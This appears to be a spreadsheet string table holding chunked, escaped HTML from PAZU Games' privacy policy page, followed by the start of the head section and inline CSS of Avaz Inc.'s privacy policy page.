                &lt;li class="mb-a1"&gt;For payment processing purposes.&lt;/li&gt;
                &lt;li class="mb-c"&gt;To comply with the law.&lt;/li&gt;
              &lt;/ul&gt;
              &lt;h3 class="mb-a"&gt;Retention of Data&lt;/h3&gt;
              &lt;p class="mb- a"&gt;
                PAZU will retain your Personal Data only for as long as is
                necessary for the purposes set out in this Privacy Policy.</t>
  </si>
  <si>
    <t xml:space="preserve">We
                will retain and use your Personal Data to the extent necessary
                to comply with our legal obligations (for example, if we are
                required to retain your data to comply with applicable laws),
                resolve disputes, and enforce our legal agreements and policies.
               &lt;/p&gt;
              &lt;p class="mb-b"&gt;
                PAZU will also retain Usage Data for internal analysis purposes.
                 Usage Data is generally retained for a shorter period of time,
                except when this data is used to strengthen the security or to
                improve the functionality of our Service, or we are legally
                obligated to retain this data for longer periods.
              </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
              &lt;h3 class="mb-a"&gt;Transfer of Data&lt;/h3&gt;
              &lt;p class="mb-a"&gt;
                Your information, including Personal Data, may be transferred to
                -- and maintained on -- computers located outside of your state,
                province, country, or other governmental jurisdiction where the
                data protection laws may differ from those of your jurisdiction.
               &lt;/p&gt;
              &lt;p class="mb-a"&gt;
                If you are located outside Israel and choose to provide
                information to us, please note that we transfer the data,
                including Personal Data, to Israel and process it there.
               &lt;/p&gt;
              &lt;p class="mb-a"&gt;
                Your consent to this Privacy Policy followed by your submission
                of such information represents your agreement to that transfer.
              </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
              &lt;p class="mb-b"&gt;
                PAZU will take all the steps reasonably necessary to ensure that
                your data is treated securely and in accordance with this
                Privacy Policy and no transfer of your Personal Data will take
                place to an organization or a country unless there are adequate
                controls in place including the security of your data and other
                personal information.
               &lt;/p&gt;
              &lt;h3 class="mb-a"&gt;Disclosure of Data&lt;/h3&gt;
              &lt;h5 class="mb-a"&gt;Business Transaction&lt;/h5&gt;
              &lt;p class="mb-b"&gt;
                If PAZU is involved in a merger, acquisition, or asset sale,
                your Personal Data may be transferred. We will provide notice
                before your Personal Data is transferred and becomes subject to
                a different Privacy Policy.
              </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
              &lt;h3 class="mb-a1"&gt;Legal Requirements&lt;/h3&gt;
              &lt;p class="mb-a1"&gt;
                PAZU may disclose your Personal Data in the good faith belief
                that such action is necessary to:
              &lt;/p&gt;
              &lt;ul class="ul-x"&gt;
                &lt;li class="mb-a1"&gt;To comply with a legal obligation.&lt;/li&gt;
                &lt;li class="mb-a1"&gt;
                  To protect and defend the rights or property of PAZU.
                 &lt;/li&gt;
                &lt;li class="mb-a1"&gt;
                  To prevent or investigate possible wrongdoing in connection
                  with the Service.
                 &lt;/li&gt;
                &lt;li class="mb-a1"&gt;
                  To protect the personal safety of users of the Service or the
                  public.
                </t>
  </si>
  <si>
    <t>&lt;/li&gt;
                &lt;li class="mb-c"&gt;To protect against legal liability.&lt;/li&gt;
              &lt;/ul&gt;
              &lt;h3 class="mb-a"&gt;Security of Data&lt;/h3&gt;
              &lt;p class="mb-a"&gt;
                The security of your data is important to us but remember that
                no method of transmission over the Internet or method of
                electronic storage is 100% secure.
               &lt;/p&gt;
              &lt;p class="mb-a"&gt;
                While we strive to use commercially acceptable means to protect
                your Personal Data, we cannot guarantee its absolute security.
               &lt;/p&gt;
              &lt;p class="mb-a"&gt;
                Our Policy on "Do Not Track" Signals under the California Online
                Protection Act (CalOPPA)
              &lt;/p&gt;
              &lt;p class="mb-a"&gt;
                We do not support Do Not Track ("DNT").</t>
  </si>
  <si>
    <t>Do Not Track is a
                preference you can set in your web browser to inform websites
                that you do not want to be tracked.
               &lt;/p&gt;
              &lt;p class="mb-a"&gt;
                You can enable or disable Do Not Track by visiting the
                Preferences or Settings page of your web browser.
               &lt;/p&gt;
              &lt;p class="mb-a"&gt;
                Your Data Protection Rights under the General Data Protection
                Regulation (GDPR)
              &lt;/p&gt;
              &lt;p class="mb-a"&gt;
                If you are a resident of the European Economic Area (EEA), you
                have certain data protection rights.</t>
  </si>
  <si>
    <t xml:space="preserve">PAZU aims to take
                reasonable steps to allow you to correct, amend, delete, or
                limit the use of your Personal Data.
               &lt;/p&gt;
              &lt;p class="mb-a"&gt;
                If you wish to be informed about what Personal Data we hold
                about you and if you want it to be removed from our systems,
                please contact us.
              </t>
  </si>
  <si>
    <t>&lt;/p&gt;
              &lt;p class="mb-a"&gt;
                In certain circumstances, you have the following data protection
                rights:
              &lt;/p&gt;
              &lt;ul class="ul-x"&gt;
                &lt;li class="mb-a1"&gt;
                   The right to access, update or delete the information we have
                  on you. Whenever made possible, you can access, update or
                  request deletion of your Personal Data directly within your
                  account settings section.</t>
  </si>
  <si>
    <t>If you are unable to perform these
                  actions yourself, please contact us to assist you.
                 &lt;/li&gt;
                &lt;li class="mb-a1"&gt;
                   The right of rectification.</t>
  </si>
  <si>
    <t>You have the right to have your
                  information rectified if that information is inaccurate or
                  incomplete.
                 &lt;/li&gt;
                &lt;li class="mb-a1"&gt;
                   The right to object.</t>
  </si>
  <si>
    <t>You have the right to object to our
                  processing of your Personal Data.
                 &lt;/li&gt;
                &lt;li class="mb-a1"&gt;
                   The right of restriction.</t>
  </si>
  <si>
    <t>You have the right to request that
                  we restrict the processing of your personal information.
                 &lt;/li&gt;
                &lt;li class="mb-a1"&gt;
                   The right to data portability.</t>
  </si>
  <si>
    <t>You have the right to be
                  provided with a copy of the information we have on you in a
                  structured, machine-readable, and commonly used format.
                 &lt;/li&gt;
                &lt;li class="mb-a1"&gt;
                   The right to withdraw consent.</t>
  </si>
  <si>
    <t xml:space="preserve">You also have the right to
                  withdraw your consent at any time where PAZU relied on your
                  consent to process your personal information.
                 &lt;/li&gt;
              &lt;/ul&gt;
              &lt;p class="mb-a"&gt;
                Please note that we may ask you to verify your identity before
                responding to such requests.
               &lt;/p&gt;
              &lt;p class="mb-b"&gt;
                </t>
  </si>
  <si>
    <t xml:space="preserve">You have the right to complain to a Data Protection Authority
                about our collection and use of your Personal Data. For more
                information, please contact your local data protection authority
                in the European Economic Area (EEA).
               &lt;/p&gt;
              &lt;h3 class="mb-a"&gt;Service Providers&lt;/h3&gt;
              &lt;p class="mb-a"&gt;
                We may employ third party companies and individuals to
                facilitate our Service ("Service Providers"), provide the
                Service on our behalf, perform Service-related services or
                assist us in analyzing how our Service is used.
              </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
              &lt;p class="mb-b"&gt;
                 These third parties have access to your Personal Data only to
                perform these tasks on our behalf and are obligated not to
                disclose or use it for any other purpose.
               &lt;/p&gt;
              &lt;h3 class="mb-a"&gt;Analytics&lt;/h3&gt;
              &lt;p class="mb-b"&gt;
                </t>
  </si>
  <si>
    <t xml:space="preserve">We do not use third-party Service Providers for Analytics.
               &lt;/p&gt;
              &lt;h3 class="mb-a"&gt;Payments&lt;/h3&gt;
              &lt;p class="mb-a"&gt;
                We may provide paid products and/or services within the Service.
                 In that case, we use third-party services for payment processing
                (e.g. payment processors).
              </t>
  </si>
  <si>
    <t>&lt;/p&gt;
              &lt;p class="mb-a"&gt;
                We will not store or collect your payment card details. That
                information is provided directly to our third-party payment
                processors whose use of your personal information is governed by
                their Privacy Policy. These payment processors adhere to the
                standards set by PCI-DSS as managed by the PCI Security
                Standards Council, which is a joint effort of brands like Visa,
                MasterCard, American Express and Discover.</t>
  </si>
  <si>
    <t xml:space="preserve">PCI-DSS requirements
                help ensure the secure handling of payment information.
               &lt;/p&gt;
              &lt;p class="mb-a"&gt;The payment processors we work with are:&lt;/p&gt;
              &lt;p class="mb-a"&gt;
                Apple Store In-App Payments &lt;br /&gt;
                 Their Privacy Policy can be viewed at
                https://www.apple.com/legal/privacy/en-ww/
              &lt;/p&gt;
              &lt;p class="mb-b"&gt;
                Google Play In-App Payments &lt;br /&gt;
                </t>
  </si>
  <si>
    <t xml:space="preserve">Their Privacy Policy can be viewed at
                https://www.google.com/policies/privacy/
              &lt;/p&gt;
              &lt;h3 class="mb-a"&gt;Links to Other Sites&lt;/h3&gt;
              &lt;p class="mb-a"&gt;
                Our Service may contain links to other sites that are not
                operated by us. If you click a third party link, you will be
                directed to that third party's site. &lt;br /&gt;
                We strongly advise you to review the Privacy Policy of every
                site you visit.
              </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
              &lt;p class="mb-b"&gt;
                 We have no control over and assume no responsibility for the
                content, privacy policies or practices of any third party sites
                or services.
               &lt;/p&gt;
              &lt;h3 class="mb-a"&gt;Children's Privacy&lt;/h3&gt;
              &lt;p class="mb-b"&gt;
                </t>
  </si>
  <si>
    <t xml:space="preserve">We do not knowingly collect personally identifiable information
                from anyone under the age of 18. If you are a parent or guardian
                and you are aware that your Child has provided us with Personal
                Data, please contact us. If we become aware that we have
                collected Personal Data from children without verification of
                parental consent, we take steps to remove that information from
                our servers.
              </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
              &lt;h3 class="mb-a"&gt;Changes to This Privacy Policy&lt;/h3&gt;
              &lt;p class="mb-a"&gt;
                We may update our Privacy Policy from time to time. We will
                notify you of any changes by posting the new Privacy Policy on
                this page.
               &lt;/p&gt;
              &lt;p class="mb-a"&gt;
                We will let you know via email and/or a prominent notice on our
                Service, prior to the change becoming effective and update the
                "effective date" at the top of this Privacy Policy.
              </t>
  </si>
  <si>
    <t>&lt;/p&gt;
              &lt;p class="mb-b"&gt;
                You are advised to review this Privacy Policy periodically for
                any changes. Changes to this Privacy Policy are effective when
                they are posted on this page.
               &lt;/p&gt;
              &lt;h3 class="mb-a"&gt;Contact Us&lt;/h3&gt;
              &lt;p class="mb-b"&gt;
                If you have any questions about this Privacy Policy, please
                contact us: info@pazugames.com
              &lt;/p&gt;
            &lt;/div&gt;
          &lt;/div&gt;
        &lt;/section&gt;
        &lt;!-- txt-a-section-end --&gt;
        &lt;!--  --&gt;
      &lt;/main&gt;
      &lt;!-- main end --&gt;
      &lt;!-- footer-section --&gt;
      &lt;footer class="footer-section"&gt;
        &lt;div class="container"&gt;
          &lt;div class="footer-section-inner"&gt;
            &lt;a href="../index.html"</t>
  </si>
  <si>
    <t>class="footer-logo"&gt;
              &lt;img src="../images/logo-white.svg" alt="" /&gt;
            &lt;/a&gt;
            &lt;!-- &lt;div class="f-social footer-social"&gt;
              &lt;a href="https://www.instagram.com/pazugames/" target="_blank"&gt;
                &lt;i class="fab fa-instagram"&gt;&lt;/i&gt;
              &lt;/a&gt;
              &lt;a href="https://www.facebook.com/pazugames/" target="_blank"&gt;
                &lt;i class="fab</t>
  </si>
  <si>
    <t>fa-facebook-f"&gt;&lt;/i&gt;
              &lt;/a&gt;
             &lt;/div&gt; --&gt;
            &lt;div class="footer-menu"&gt;
              &lt;ul&gt;
                &lt;li&gt;&lt;a href="../game-lobby.html"&gt;Our Games&lt;/a&gt;&lt;/li&gt;
                &lt;li&gt;&lt;a href=".. /about.html"&gt;About&lt;/a&gt;&lt;/li&gt;
                &lt;li&gt;&lt;a href="..</t>
  </si>
  <si>
    <t>/career.html"&gt;Careers&lt;/a&gt;&lt;/li&gt;
                &lt;!--&lt;li&gt;&lt;a href="#"&gt;Knowledge&lt;/a&gt;&lt;/li&gt;--&gt;
                &lt;li&gt;&lt;a href="../support-page.html"&gt;Contact&lt;/a&gt;&lt;/li&gt;
                &lt;li&gt;&lt;a href="#"&gt;Privacy Policy&lt;/a&gt;&lt;/li&gt;
                &lt;li&gt;&lt;a href="../terms-of-use"&gt;Terms of Service&lt;/a&gt;&lt;/li&gt;
              &lt;/ul&gt;
            &lt;/div&gt;
          &lt;/div&gt;
        &lt;/div&gt;
      &lt;/footer&gt;
      &lt;!</t>
  </si>
  <si>
    <t>--End footer-section --&gt;
      &lt;!-- Modal --&gt;
      &lt;div
        class="modal fade hero-video-modal"
        id="video-modal"
        tabindex="-1"
        aria-labelledby="exampleModalLabel"
        aria-hidden="true"
      &gt;
        &lt;div class="modal-dialog modal-dialog-centered mx-auto"&gt;
          &lt;div class="modal-content"&gt;
            &lt;div class="hero-video-modal-inner"&gt;
              &lt;a href="#" data-bs-dismiss="modal" class="close-button"&gt;
                 &lt;i class="far fa-times"&gt;&lt;/i&gt;
              &lt;/a&gt;
              &lt;iframe
                width="560"
                height="315"
                src="https://www.youtube.com/embed/abqUMxj-1WI"
                title="YouTube video player"
                frameborder="0"
                allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture"
                allowfullscreen
              &gt;&lt;/iframe&gt;
            &lt;/div&gt;
          &lt;/div&gt;
        &lt;/div&gt;
      &lt;/div&gt;
    &lt;/div&gt;
    &lt;!-- main-wrap --&gt;
    &lt;!--</t>
  </si>
  <si>
    <t xml:space="preserve">js --&gt;
    &lt;script src="../js/jquery-3.6.0.min.js"&gt;&lt;/script&gt;
    &lt;script src="../js/html5shiv.js"&gt;&lt;/script&gt;
    &lt;script src="../js/respond.js"&gt;&lt;/script&gt;
    &lt;script src="../js/selectivizr-1.0.2.min.js"&gt;&lt;/script&gt;
    &lt;script src="../js/waypoint.js"&gt;&lt;/script&gt;
    &lt;script src="../js/bootstrap.bundle.min.js"&gt;&lt;/script&gt;
    &lt;script src="../js/jquery.scrollUp.min.js"&gt;&lt;/script&gt;
    &lt;script src="../js/owl.carousel.min.js"&gt;&lt;/script&gt;
    &lt;script src="../js/main.js"&gt;&lt;/script&gt;
    &lt;!-- End All Js --&gt;
  &lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en-US"&gt;
&lt;head&gt;
	&lt;meta charset="UTF-8"&gt;
	&lt;meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1"&gt;
	&lt;link rel="profile" href="http://gmpg.org/xfn/11"&gt;
		&lt;meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' /&gt;
	&lt;!-- This site is optimized with the Yoast SEO plugin v20.5 - https://yoast.com/wordpress/plugins/seo/ --&gt;
	&lt;title&gt;Privacy Policy - Avaz Inc.&lt;/title&gt;&lt;link rel="preload" as="style" href="https://fonts.googleapis.com/ css?family=Montserrat%3A500%2C400%2C800&amp;#038;display=swap" /&gt;&lt;link rel="stylesheet" href="https://fonts.googleapis.com/</t>
  </si>
  <si>
    <t>css?family=Montserrat%3A500%2C400%2C800&amp;#038;display=swap" media="print" onload="this.media='all'" /&gt;&lt;noscript&gt;&lt;link rel="stylesheet" href="https://fonts.googleapis.com/ css?family=Montserrat%3A500%2C400%2C800&amp;#038;display=swap" /&gt;&lt;/noscript&gt;
	&lt;meta name="description" content="This privacy statement describes how Avaz Inc. collects and uses the personal information you provide in all our products" /&gt;
	&lt;link rel="canonical" href="https://www.avazapp.com/privacy-policy/" /&gt;
	&lt;meta property="og:locale" content="en_US" /&gt;
	&lt;meta property="og:type" content="article" /&gt;
	&lt;meta property="og:title" content="Privacy Policy - Avaz Inc." /&gt;
	&lt;meta property="og:description" content="This privacy statement describes how Avaz Inc. collects and uses the personal information you provide in all our products" /&gt;
	&lt;meta property="og:url" content="https://www.avazapp.com/privacy-policy/" /&gt;
	&lt;meta property="og:site_name" content="Avaz Inc." /&gt;
	&lt;meta property="article:modified_time" content="2022-04-11T06:45:17+00:00" /&gt;
	&lt;meta name="twitter:card" content="summary_large_image" /&gt;
	&lt;meta name="twitter:label1" content="Est. reading time" /&gt;
	&lt;meta name="twitter:data1" content="6 minutes" /&gt;
	&lt;script type="application/ld+json" class="yoast-schema-graph"&gt;{"@context":"https://schema.org","@graph":[{"@type":"WebPage","@id":"https://www.avazapp.com/privacy-policy/","url":"https://www.avazapp.com/privacy-policy/","name":"Privacy Policy - Avaz Inc.","isPartOf":{"@id":"https://avazapp.com/#website"},"datePublished":"2020-08-05T13:39:03+00:00","dateModified":"2022-04-11T06:45:17+00:00","description":"This privacy statement describes how Avaz Inc. collects and uses the personal information you provide in all our products","breadcrumb":{"@id":"https://www.avazapp.com/privacy-policy/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://www.avazapp.com/privacy-policy/"]}]},{"@type":"BreadcrumbList","@id":"https://www.avazapp.com/privacy-policy/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://avazapp.com/"},{"@type":"ListItem","position":2,"name":"Privacy Policy"}]},{"@type":"WebSite","@id":"https://avazapp.com/#website","url":"https://avazapp.com/","name":"Avaz Inc.","description":"Making</t>
  </si>
  <si>
    <t>Every Voice Heard","publisher":{"@id":"https://avazapp.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://avazapp.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https://avazapp.com/#organization","name":"Avaz Inc.","url":"https://avazapp.com/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://avazapp.com/#/schema/logo/image/","url":"http://avazapp.com/wp-content/uploads/2021/06/Avaz-AAC-Logo.png","contentUrl":"http://avazapp.com/wp-content/uploads/2021/06/Avaz-AAC-Logo.png","width":150,"height":150,"caption":"Avaz Inc."},"image":{"@id":"https://avazapp.com/#/schema/logo/image/"}}]}&lt;/script&gt;
	&lt;!-- / Yoast SEO plugin. --&gt;
&lt;link rel='dns-prefetch' href='//www.googletagmanager.com' /&gt;
&lt;link rel='dns-prefetch' href='//fonts.googleapis.com' /&gt;
&lt;link href='https://fonts.gstatic.com' crossorigin rel='preconnect' /&gt;
&lt;link rel='stylesheet' id='wp-block-library-css'  href='https://www.avazapp.com/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /&gt;
&lt;style id='otter-advanced-columns-style-inline-css' type='text/css'&gt;
 .wp-block-themeisle-blocks-advanced-columns-separators{position:absolute;left:0;width:100%;overflow-x:clip}.wp-block-themeisle-blocks-advanced-columns-separators.top{top:0}.wp-block-themeisle-blocks-advanced-columns-separators.bottom{bottom:0}.wp-block-themeisle-blocks-advanced-columns-separators.bottom svg{position:absolute;bottom:0}.wp-block-themeisle-blocks-advanced-columns-separators svg{height:100px}.wp-block-themeisle-blocks-advanced-columns-separators .rotate{transform:rotate(180deg)}html[lang=ja] .wp-block-themeisle-blocks-advanced-columns .innerblocks-wrap,html[lang=ko] .wp-block-themeisle-blocks-advanced-columns .innerblocks-wrap,html[lang=zh] .wp-block-themeisle-blocks-advanced-columns .innerblocks-wrap,html[lang=zh-Hans] .wp-block-themeisle-blocks-advanced-columns .innerblocks-wrap,html[lang=zh-Hant] .wp-block-themeisle-blocks-advanced-columns .innerblocks-wrap{word-break:normal}.wp-block-themeisle-blocks-advanced-columns{--background: transparent;--columns-width: 100%;--horizontal-align: unset;background:var(--background);justify-content:var(--horizontal-align);transition:.3s}.wp-block-themeisle-blocks-advanced-columns .wp-themeisle-block-overlay,.wp-block-themeisle-blocks-advanced-columns .wp-block-themeisle-blocks-advanced-columns-overlay{position:absolute;width:100%;height:100%;top:0;left:0}.wp-block-themeisle-blocks-advanced-columns .wp-block-themeisle-blocks-advanced-column:only-child{max-width:var(--columns-width)}.wp-block-themeisle-blocks-advanced-columns .wp-block-themeisle-blocks-advanced-column{--background: transparent;--background-color-hover: var( --background );--link-color: inherit;background:var(--background);transition:.3s}.wp-block-themeisle-blocks-advanced-columns .wp-block-themeisle-blocks-advanced-column:hover{background:var(--background-color-hover)}.wp-block-themeisle-blocks-advanced-columns .wp-block-themeisle-blocks-advanced-column&gt;*{position:relative}.wp-block-themeisle-blocks-advanced-columns .wp-block-themeisle-blocks-advanced-column .wp-block-themeisle-blocks-advanced-column-overlay{position:absolute;width:100%;height:100%;top:0;left:0}.wp-block-themeisle-blocks-advanced-columns .wp-block-themeisle-blocks-advanced-column .wp-block-themeisle-blocks-slider{display:grid}.wp-block-themeisle-blocks-advanced-columns .wp-block-themeisle-blocks-advanced-column .aligncenter{margin-left:auto;margin-right:auto}.wp-block-themeisle-blocks-advanced-columns .wp-block-themeisle-blocks-advanced-column.has-dark-bg{color:#fff}.wp-block-themeisle-blocks-advanced-columns.has-default-gap .wp-block-themeisle-blocks-advanced-column{margin-left:10px;margin-right:10px}.wp-block-themeisle-blocks-advanced-columns.has-nogap-gap .wp-block-themeisle-blocks-advanced-column{margin-left:0;margin-right:0}.wp-block-themeisle-blocks-advanced-columns.has-narrow-gap .wp-block-themeisle-blocks-advanced-column{margin-left:5px;margin-right:5px}.wp-block-themeisle-blocks-advanced-columns.has-extended-gap .wp-block-themeisle-blocks-advanced-column{margin-left:15px;margin-right:15px}.wp-block-themeisle-blocks-advanced-columns.has-wide-gap .wp-block-themeisle-blocks-advanced-column{margin-left:20px;margin-right:20px}.wp-block-themeisle-blocks-advanced-columns.has-wider-gap .wp-block-themeisle-blocks-advanced-column{margin-left:30px;margin-right:30px}.wp-block-themeisle-blocks-advanced-columns.has-dark-bg{color:#fff}@media(min-width: 960px){.wp-block-themeisle-blocks-advanced-columns{display:flex;position:relative}.wp-block-themeisle-blocks-advanced-columns.has-vertical-flex-start&gt;.innerblocks-wrap,.wp-block-themeisle-blocks-advanced-columns.has-vertical-top&gt;.innerblocks-wrap{align-items:flex-start}.wp-block-themeisle-blocks-advanced-columns.has-vertical-center&gt;.innerblocks-wrap{align-items:center}.wp-block-themeisle-blocks-advanced-columns.has-vertical-flex-end&gt;.innerblocks-wrap,.wp-block-themeisle-blocks-advanced-columns.has-vertical-bottom&gt;.innerblocks-wrap{align-items:flex-end}.wp-block-themeisle-blocks-advanced-columns .innerblocks-wrap{display:flex;flex-basis:100%;word-break:keep-all;max-width:var(--columns-width)}.wp-block-themeisle-blocks-advanced-columns .innerblocks-wrap .wp-block-themeisle-blocks-advanced-column{position:relative}.wp-block-themeisle-blocks-advanced-columns .innerblocks-wrap .wp-block-themeisle-blocks-advanced-column:first-child{margin-left:0}.wp-block-themeisle-blocks-advanced-columns .innerblocks-wrap .wp-block-themeisle-blocks-advanced-column:last-child{margin-right:0}.wp-block-themeisle-blocks-advanced-columns.hide-in-desktop{display:none}.wp-block-themeisle-blocks-advanced-columns.has-1-columns.has-desktop-equal-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column{flex-basis:100%}.wp-block-themeisle-blocks-advanced-columns.has-2-columns.has-desktop-equal-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column{flex-basis:50%}.wp-block-themeisle-blocks-advanced-columns.has-2-columns.has-desktop-oneTwo-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column{flex-basis:33.34%}.wp-block-themeisle-blocks-advanced-columns.has-2-columns.has-desktop-oneTwo-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column:last-child{flex-basis:66.66%}.wp-block-themeisle-blocks-advanced-columns.has-2-columns.has-desktop-twoOne-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column{flex-basis:33.34%}.wp-block-themeisle-blocks-advanced-columns.has-2-columns.has-desktop-twoOne-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column:first-child{flex-basis:66.66%}.wp-block-themeisle-blocks-advanced-columns.has-3-columns.has-desktop-equal-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column{flex-basis:33.33%}.wp-block-themeisle-blocks-advanced-columns.has-3-columns.has-desktop-oneOneTwo-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column{flex-basis:25%}.wp-block-themeisle-blocks-advanced-columns.has-3-columns.has-desktop-oneOneTwo-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column:last-child{flex-basis:50%}.wp-block-themeisle-blocks-advanced-columns.has-3-columns.has-desktop-twoOneOne-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column{flex-basis:25%}.wp-block-themeisle-blocks-advanced-columns.has-3-columns.has-desktop-twoOneOne-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column:first-child{flex-basis:50%}.wp-block-themeisle-blocks-advanced-columns.has-3-columns.has-desktop-oneTwoOne-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column{flex-basis:50%}.wp-block-themeisle-blocks-advanced-columns.has-3-columns.has-desktop-oneTwoOne-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column:first-child{flex-basis:25%}.wp-block-themeisle-blocks-advanced-columns.has-3-columns.has-desktop-oneTwoOne-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column:last-child{flex-basis:25%}.wp-block-themeisle-blocks-advanced-columns.has-3-columns.has-desktop-oneThreeOne-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column{flex-basis:60%}.wp-block-themeisle-blocks-advanced-columns.has-3-columns.has-desktop-oneThreeOne-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column:first-child{flex-basis:20%}.wp-block-themeisle-blocks-advanced-columns.has-3-columns.has-desktop-oneThreeOne-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column:last-child{flex-basis:20%}.wp-block-themeisle-blocks-advanced-columns.has-4-columns.has-desktop-equal-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column{flex-basis:25%}.wp-block-themeisle-blocks-advanced-columns.has-5-columns.has-desktop-equal-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column{flex-basis:20%}.wp-block-themeisle-blocks-advanced-columns.has-6-columns.has-desktop-equal-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column{flex-basis:16.66%}}@media(min-width: 600px)and (max-width: 960px){.wp-block-themeisle-blocks-advanced-columns{display:flex;position:relative}.wp-block-themeisle-blocks-advanced-columns .innerblocks-wrap{display:flex;flex-basis:100%;word-break:keep-all;max-width:var(--columns-width)}.wp-block-themeisle-blocks-advanced-columns .innerblocks-wrap .wp-block-themeisle-blocks-advanced-column{position:relative;flex:1}.wp-block-themeisle-blocks-advanced-columns.hide-in-tablet{display:none}.wp-block-themeisle-blocks-advanced-columns.has-2-columns.has-tablet-oneTwo-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column:last-child{flex:2}.wp-block-themeisle-blocks-advanced-columns.has-2-columns.has-tablet-twoOne-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column:first-child{flex:2}.wp-block-themeisle-blocks-advanced-columns.has-3-columns.has-tablet-oneOneTwo-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column:last-child{flex:2}.wp-block-themeisle-blocks-advanced-columns.has-3-columns.has-tablet-twoOneOne-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column:first-child{flex:2}.wp-block-themeisle-blocks-advanced-columns.has-3-columns.has-tablet-oneTwoOne-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column{flex:2}.wp-block-themeisle-blocks-advanced-columns.has-3-columns.has-tablet-oneTwoOne-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column:first-child{flex:1}.wp-block-themeisle-blocks-advanced-columns.has-3-columns.has-tablet-oneTwoOne-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column:last-child{flex:1}.wp-block-themeisle-blocks-advanced-columns.has-3-columns.has-tablet-oneThreeOne-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column{flex:3}.wp-block-themeisle-blocks-advanced-columns.has-3-columns.has-tablet-oneThreeOne-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column:first-child{flex:1}.wp-block-themeisle-blocks-advanced-columns.has-3-columns.has-tablet-oneThreeOne-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column:last-child{flex:1}.wp-block-themeisle-blocks-advanced-columns:not(.has-tablet-collapsedRows-layout).has-vertical-flex-start&gt;.innerblocks-wrap,.wp-block-themeisle-blocks-advanced-columns:not(.has-tablet-collapsedRows-layout).has-vertical-top&gt;.innerblocks-wrap{align-items:flex-start}.wp-block-themeisle-blocks-advanced-columns:not(.has-tablet-collapsedRows-layout).has-vertical-center&gt;.innerblocks-wrap{align-items:center}.wp-block-themeisle-blocks-advanced-columns:not(.has-tablet-collapsedRows-layout).has-vertical-flex-end&gt;.innerblocks-wrap,.wp-block-themeisle-blocks-advanced-columns:not(.has-tablet-collapsedRows-layout).has-vertical-bottom&gt;.innerblocks-wrap{align-items:flex-end}.wp-block-themeisle-blocks-advanced-columns.has-tablet-collapsedRows-layout&gt;.innerblocks-wrap{flex-direction:column}.wp-block-themeisle-blocks-advanced-columns.has-tablet-collapsedRows-layout.has-reverse-columns-tablet&gt;.innerblocks-wrap{flex-direction:column-reverse}.wp-block-themeisle-blocks-advanced-columns.has-tablet-twoColumnGrid-layout&gt;.innerblocks-wrap{display:flex;flex-wrap:wrap}.wp-block-themeisle-blocks-advanced-columns.has-tablet-twoColumnGrid-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column{flex:1 1 40%}.wp-block-themeisle-blocks-advanced-columns.has-tablet-threeColumnGrid-layout&gt;.innerblocks-wrap{display:flex;flex-wrap:wrap}.wp-block-themeisle-blocks-advanced-columns.has-tablet-threeColumnGrid-layout&gt;.innerblocks-wrap&gt;.wp-block-themeisle-blocks-advanced-column{flex:1 1 30%}}@media(max-width: 